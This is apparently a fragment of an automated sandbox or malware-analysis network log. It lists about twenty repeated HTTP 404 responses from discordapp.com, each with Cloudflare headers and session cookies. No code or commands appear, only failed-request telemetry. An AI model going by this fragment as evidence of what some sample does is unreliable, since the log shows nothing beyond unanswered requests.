        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:18 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=TM0WgwnCdWV5EI2EFCI7RetZqJKvnynsHlRAP46Yxd8-1736950758-1.0.1.1-YiqDepsOJEqYWpLHJew0UlftcWASkDedMFJQj_rdTUEhagmeERV3de2yqXbD_jDANOlbKIkjI.FBdriUzZG1Zg; path=/; expires=Wed, 15-Jan-25 14:49:18 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcUQ%2FwjE%2BYeyg%2FCw%2BuU5sC%2BwUzA8edXlfboY3bEHhgoEPeOtGZeAb6Zta3CaZ6mab74IO4Gm2FPlY4QYWvqgoq0QAuzVuztBx3HZ9fCWMFmhmiLrWmE6lF%2BSTP0GBwcDTWN28g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=NBBwomD_aWliSeYZYpYtDDbx9eg5La688JlEqij29Xk-1736950758797-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680025f6a0c9c-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:24 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=F7QkNRnc3xmRxVvV9zzcLxtoUTS2rdNMwvk_3Ps6FnU-1736950764-1.0.1.1-C6ZXZxPnOSGKo2g9mwNIGR_7dVlZFK5h7z8FXC2XrPShcBxjW8LXcEWiC58RyO6hwgN.w1HAIrPfFhNBpo9X8A; path=/; expires=Wed, 15-Jan-25 14:49:24 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPBwSglxSzScbQdpFAjnOB9R9h9mBAAIuJBHJ2AjKkgyuPj6itW6s7%2BEdANTwDFeAwNhUaIHyEGi3rrLAdvDmVp8pgCBKmmwlqqoY5iRhzPUEZF9ftDyvLsGDorEl8E7sEh38A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=POu39wA5Ghdvj4D9Hl0YGjblB8aXaB8A2uv..LFn6aI-1736950764421-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680257e4a424b-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:30 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=B7UkK4GtkILtya7G_fIfzqT9117kKEWh52Lq.xa6qgI-1736950770-1.0.1.1-a31nc6GY8NPoX3fGMV7DfN1vwszl1ShYRoP7pPdfnnFQijT71Qug1GP3QrVu1aiw8Y3vcYB1W4dMXQC5cyq_dA; path=/; expires=Wed, 15-Jan-25 14:49:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BaV7niJrZKvuk8F%2FxpMnvY8LETkJkQjfVXm8jtnsCiLDzr7Jk9ipr32pbouqxwmCeW0KoP0Wrp9qwxcM4Cc2%2Baay3ZjmUA3l6FcivZaEnZIIAfVvQ4XF5gqwQL1FhgoTSzOkww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=U4CKkQsE4PsII0LkNqEhMgsh2RDIjkbCVdZoNaS0z4k-1736950770152-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680496f511a44-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:35 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=uprTm3.rdqNDHsGLmXoeD5os31XvUdElGbN8zdVY1Kc-1736950775-1.0.1.1-8lFUhAZQyZh7OJeFDrmmzX9lgLyREqJstLoUqAj4VvNGImKo9My5g.irmmbHQzwyyFRXOqnRKWEf5nESsiTq.A; path=/; expires=Wed, 15-Jan-25 14:49:35 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nY25hL6k12sD6ARwpu8nhmN4WsuIYJku%2BAHoRiaSrak27R7qZRsCdR3Dag9OWvNKLhd3eNqtaTCuDXuyfxz0cl7NUTmyxGy8gtGGErqosZzNHQgM4NxZYx2KhbYcVdhbhYDSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=B72tlU.oza_HDZg0eHNbSF94ssgzgtXCDrEZP9LxnUE-1736950775812-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026806cab59423d-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:41 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=1N7q009Mtt52yC.CZlTkZEXpS8649t56uF_4onAoTt4-1736950781-1.0.1.1-a.rdge3J9PmX3wQfsNh98lNuiaKzg1X34yCoS_LqjRihTDd5GOOuaYzorAWauNg25I0zJIi5Sxriw_ceu6IT1Q; path=/; expires=Wed, 15-Jan-25 14:49:41 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3UWDBRY68vPGsE4igMBEJnQawfCOlfpSToi3e9A3XxkvX6D7BTzeiBA7IolYcgss3uByjGfsODvoKcQeumzXW%2FYic9gBy1%2BdxT7kDPdduG9I8XE8ybrrIvXJNApyRoWiE98lrQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=rjQXGKTE85o9vJzb7ELI88RRk.mdgQq43vjhit8C_nY-1736950781451-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026808ff8990caa-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:47 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=MzDQi9ztFHvIdQHiG7Uf.GXAhRJarpmC3nYaRolKKCI-1736950787-1.0.1.1-YTOoZgXtLSXd0vTcuV10zlO3qnEH7Q9QdwPgGXX9eSmb0JNIZ87aK8zcJYe.OGDRpJmZVKHsQXJ2RgS_0GL8Cg; path=/; expires=Wed, 15-Jan-25 14:49:47 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqnFmQEuhP2VLMBZzQVq%2BVd1iY7f%2BvZFE4QjdCT5wYrQ8Z1DXK3fjctP5iJubR%2Fd1piCVsFBYbPGPuonEj6SzwqDmzfYsz9FxiCilYKRvr%2Bj0wWKwOxFi9W6fmIpjUfJIOyGqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=hnZOMiZFSap9o9bTcGOoDQCDX7fFhWn7E53xyTtKOHw-1736950787105-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680b34bc97d0e-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:52 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=lNKfaC2TEbfMiOwZP7Fxe_lJSEiVta5.xiBHArWvc5Q-1736950792-1.0.1.1-R2V7ERQ5ZNXBBK3_VhxcAdPp2nFYou1CAEhRC2R2h3yQCfXgtrfN0V2EGez1b7Hln17wWUp7E7kT8DrilTR_cA; path=/; expires=Wed, 15-Jan-25 14:49:52 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0TsyRA2kFJzPjgQAowS34ZbSqXqk54slGKwnefNTDm9yZdZmP2048GHS1tJ%2BjLDgjS9RkXEmUvDqnYCZUVvlATfKRtcNWrNzV9LyEz%2FLrM283qMx08XaxgqVgVZOWW9%2ByDUmw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=u5GnG4svosxxoWUNHaxTQfKqDZjIdJkrmKCB_ntVdqM-1736950792739-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680d67e570f64-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:58 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=_WvrAmrf.4WF8tWKWd3C.C6FumlTAM9lUTEWFpDIwGQ-1736950798-1.0.1.1-jRs_qSpaGGqtz7RuCPZLMlYSdFUKCOr1GVunT_bLz74_0LCT1zbTLtQNTTrtuCG.h1HwEXvHXZShkqVavSoZVQ; path=/; expires=Wed, 15-Jan-25 14:49:58 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ASiz4XTLCrcPtl9OAg%2F8%2FAMN1KWYzU75wMaIKONAeTlaCMKnJhg61kTeGoYpyhdj6HmUDSJ5JA6hcpt8tkIgbqiEepaixeBKMEcbwsQktl0YNyYzS9FVMJ6jK5lJP4Qw%2FW48GQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=sDhtZjVnAi4AE1dr5BdJHo0ey6XaYXxvXXWvMakjUEs-1736950798556-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902680faeaf6435c-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:04 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=H1Dexhu4JzEUxvyB7YbljRf0G6T2hLVOv3mCtZKwkDQ-1736950804-1.0.1.1-l2xlDpYeV8xBHeX6omdbl.k61dhM7rDOJzcnyFPiQW6zb0KTSCPhajcuYQvbsE0jaZiZpc_PtEHHCBpcD3ENmQ; path=/; expires=Wed, 15-Jan-25 14:50:04 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tSlAl%2FNYLXWX7KzhCVePGyxnG%2BiCcpFDygE%2BaYLU3IF86N92jtubWGPO2aXgGFnBeqGgas7WCp5WxeJUebOM0hExbMXiNB0wtYo3EXblGu60Yr%2FodH42LD0ws3QMFr0Xx%2Bt%2Byw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=nRll.bKkLGIMTmiv2QOujFp_OKpcKwKC41BY2F9bp78-1736950804216-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026811e2f6b8c35-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:09 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=ZozhuvHALTBimgv2je7sbcOA.lMIES7H.kZGJgNg8R8-1736950809-1.0.1.1-9meGAXWb1_H_KkFb9_Ae9pYYGEsdk.eq6yFXtzVr249zQ3eu8YbaYW7hd5jBK45Kv73H4eoZABk.uF_rJy9eyw; path=/; expires=Wed, 15-Jan-25 14:50:09 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kx2xAuskwbnyrib%2Bhd24jx%2FN08Pbd52sUwbb7EamwURQqzIS5rUv1WcWDd6ukpMQInZDGXh8hDRVvsXREz%2BDWk9ZiNvvX9wlJkS0n6KNYtiJSi%2BGL90Ui3C8m1TZAvtS0yssMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=K7wT8PTQFP._poRX9gQyZV5Uu_pdd9NBk74CimckA2s-1736950809855-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902681417eb10f51-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:15 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=JhWviOr9jA9Mo2J3o36fFs5ezZBL6HKAQrI0NztTRjI-1736950815-1.0.1.1-snVCJZrnhBc4E2x2BhtdEFwI7Fc6xmrHOJhPBT.Guws5pMyOJYeaIKTnAEk.e9ZYT7RPIHizHIhcqQvuJGbz_g; path=/; expires=Wed, 15-Jan-25 14:50:15 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MvDSWyOR1msblA8Rfjq39VF%2FJNeTlqB%2Bl2nzll6%2FhkLjy9DsYtkZ2mnmgBwdWQd9kHxDzads0yGNdhEI6yuT32NzKCqVnIbGGWLJDK7PdVcHkL%2Bxua7iuLaV1bV0%2BaR44xS1Hg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=Yk_2NcWuUeBmZMeuhusLDf1IiQpn8NaCk2abqmPC7YU-1736950815552-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902681650f7941ad-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:21 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=nqFuALMBfisM3lIVDdsOy_DEkXnf3QE_PLkNSjK9lII-1736950821-1.0.1.1-TwxFchA2.SwIS4oislvu0fxa1n74YYfcKaj.6nGLE7VjLTsrEi6VOHqjn7rnk.H5w7v.VwhGr7cDNKPPCopwsw; path=/; expires=Wed, 15-Jan-25 14:50:21 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W9IbHHFHH3947aZqXOojLAzwt5MmxTsbF2s8iUniVmox0lYwcqqy9DiKnDaRqnK5Ek1761Vvy%2FfpIbCboYEmgj6ESMOuX8BL4paX9nIWX%2FLfMl%2FePH7WNp91a%2FUyCTxKuX572g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=qoQmv4GSljrIDDXGHGqodNFfOl4B01zYcfwlUkwF28c-1736950821170-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902681883cfb0f83-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:26 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=WYvVTYXajXDWcuHw3QxgDBKSHaxYMlrmQajqIv8.kKs-1736950826-1.0.1.1-N2VSUOMA_UFq9QfSCil0E.jcgU0DrDnHuxW5w2Pp2Oba_Njk2LZbBY2MfghU537Fdd.NdXrmWZjLGITV6wPKCg; path=/; expires=Wed, 15-Jan-25 14:50:26 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0fL2WRRzQdSBdkW6IyzLHjXGnH8R8u31eINGWyicK8laXzm28HpiSB7SeKTeG%2BgVMyg%2F0jXOE33tiyPG5qJDKULyefmF%2BhuzDw2yQKLQOHh0rsdGNrgEnbZBiJGTswaJBi1PYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=vX4_Pypk94h3LEqoVxquaPGB5AUVw81t02JFcmK3zMc-1736950826848-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902681ab688172a1-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:32 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=lKCH4U43LyvluZZ1_moWWdMRp9mlmUmNEzQaiSj5h6A-1736950832-1.0.1.1-ly.OBNYNf8kgRJiCLlU2XXUamLdJLFLTbU_nI_jOJ6A_2oKYEVxVGEQwKGdWgqQx5epwRFOWr5VtpE97nBAmWw; path=/; expires=Wed, 15-Jan-25 14:50:32 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bQmT5g4hJ6sT9pOoEMIeTMY7YfaUjKWUauX71ggdgKoA1QuwQ5SNlfHtXZC9%2F3%2F%2Fv%2FZpmeT8bVR828GECqahyvadXupRPRMusO3m%2FqrpgKjOi3AoESOyOHacDKUk7DXYesaBqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=YZTKzOvy_7W0XQ0CU2oHTGRGHCLBEyzdibgKIPNHNsg-1736950832453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902681cebd73184d-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:38 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=5IVWCrP66ri2uMnu1eOemMOffPzHg55KuVK7HOn_yyQ-1736950838-1.0.1.1-DvEuJKHW0DscPHrbKdLOvCsp0M.g7sTsmSY4TORRPeGkqaW4YFglYFErzIVyvsa5cCzt5PGUt.DUTUyOQVJaJw; path=/; expires=Wed, 15-Jan-25 14:50:38 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=406pDaN8%2BOqqyr4yECVzUzJMxbwzmRChf27eLqM%2FTFsu%2BVuNX3mWkoO%2BX47%2FE4j0FKZqJF9gnfmiZCfk0gE2fcfyCOeah8cfaIZljShUxazcXxjlsuFKqnz7w2h7HxU0W14ABg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=Hi9JTkbN9C2m_.FH4H3EDQdiLs6wVi7emDpNS6P5tWw-1736950838179-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902681f28dda0c84-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:43 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=16YvwmwPebmuJUkGnLuc2PVnou1PaOJK_iVXqkB3HIk-1736950843-1.0.1.1-bUKrTMuuO_x0aKZuyV6.qdu6DULuHnrpVV1mS3jcSkRsgisYur2Sn32QdR_nWmGF0FBaR7dSoIkrIR_QPoNbPQ; path=/; expires=Wed, 15-Jan-25 14:50:43 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l8INunvr2tM4M6N6mHgXTMpDrT7WOBUPvINyuVE%2BHzdgrdcx%2F9kgZRUYDc8%2FXp%2FRy%2BnvJXbxNmezh99Fjr9CAEnMZ7VxsulzTNHsa5jfMsiEmb48LwiSbiwyVa5%2BzZTxqd6v%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=WuwZbGzrD1Q2d8iJcO47Hbk41QjRsEBNnae9C4cnO6c-1736950843813-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90268215bbeb435d-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:49 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=AAOJlr9PoI647ppvdzzfhZwkg2xPM2nmY3gxKq9e.2g-1736950849-1.0.1.1-C6JbSl42EPVOIVijCDsndxhGJG880xMzSAkEzGndRc8kMj3jI5hCEhp.Udlquu.NnYHBptZSEtk7zx0hq8Bklg; path=/; expires=Wed, 15-Jan-25 14:50:49 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IRlQkAQrPZH7FoHw1JPfIqfh5BbdpfCKPial4mjm69rzbglRXKn4%2Fnk2kL%2FGD2WNn4gjY2h5%2F%2BMXq4gLR4LazqmgpIzehxkz1gbYkeC2vJLyis%2FttSdCbHKIhoQV1vILVv5GYg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=v9WvJwRlTAdzVuRJsYjILjGl2VLmZwwlI4r4jEUsFVY-1736950849426-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90268238ced472a7-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:20:55 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=OqRPzqswIra6hrO2UMaiauvkrdOa5mPQL77UDQFLdTg-1736950855-1.0.1.1-76A8DL_EqI39Me6hU4zgBZV5VLQg7YrL1eZ_DzwakCJNzxI9eucpbrkjPd3hcLgh0Q4ChTiMTDUVaXdE2xyo.w; path=/; expires=Wed, 15-Jan-25 14:50:55 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqIdWA1mCptmabeiTo3tSGkOF7dTUqx0YGq9Td%2FYJDm%2FJHr4LFzIeZZkPW%2BtxoYVgZafYHa9RLxFpX%2BQLJ2f8Trdi7WG%2BKmxqJxaDM5%2BTHg8rzW05C7XThe9ufT5N%2BQbIPy3rg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=w7eapzP9i9t_v4lD3E.BQ4DmetI5GOQRIEohT_Fnk2E-1736950855193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026825ccfed4210-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:00 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=EjKIvZu2Vc4zsIOBxB21KbUxoBcmYanzCAkQrjqi2nQ-1736950860-1.0.1.1-IKrPhvcr9VkiSZpVks0ijjgFopbad0QfPhgCCOiwpp0P3I.X44k_BfplrEL0fd6feu.9tewf0vIygp8bPQk3Bw; path=/; expires=Wed, 15-Jan-25 14:51:00 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXFzlh75Z6LQ73E77XDXtxFvv1deBzgKy01CL6nYETm5uG0O1tVeA00XHxdqGbxIL2tT8pSbDQQ0vw1PymOmxAFYOgzDDONjkJp4S8TPtEzCeoOSNz4eQHQ2sD3TgevBmdJhjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=Jft4aplAsvvXiz.Oj6lDanZ.2MoO_.FleHx1d4SE22E-1736950860860-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902682803d7e421b-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:21:06 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=XI9gK2oL9f3Opz0bNjet2QRYJrDoohBIEY1iZ.4sMqA-1736950866-1.0.1.1-gm1en4m.__.4ZNGghrHlPwIXXmiKeGOkB9PvEaFaSVIWvN4hXX8SIEV_QeHGuSwEHwj5DM_n3DWxnIt04g6gMA; path=/; expires=Wed, 15-Jan-25 14:51:06 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4SIjozg82ijxSCfGJ8Q9hTuUxaosoBpt9UrG898VI7Fc24NqHHCbFnTeRCKxh67KTCY%2FVl73%2FD9anDRLCQZx4h0elAw4OY6Fr09CR%2BI03UWEtDNNttmv2QKahDPesdDIzVqRw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=FBbmEqwgUfRtEFpmFDkWAve52ILyZqJZY1btgfwDmyQ-1736950866486-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902682a36d6343c4-EWRalt-svc: h3=":443"; ma=86400
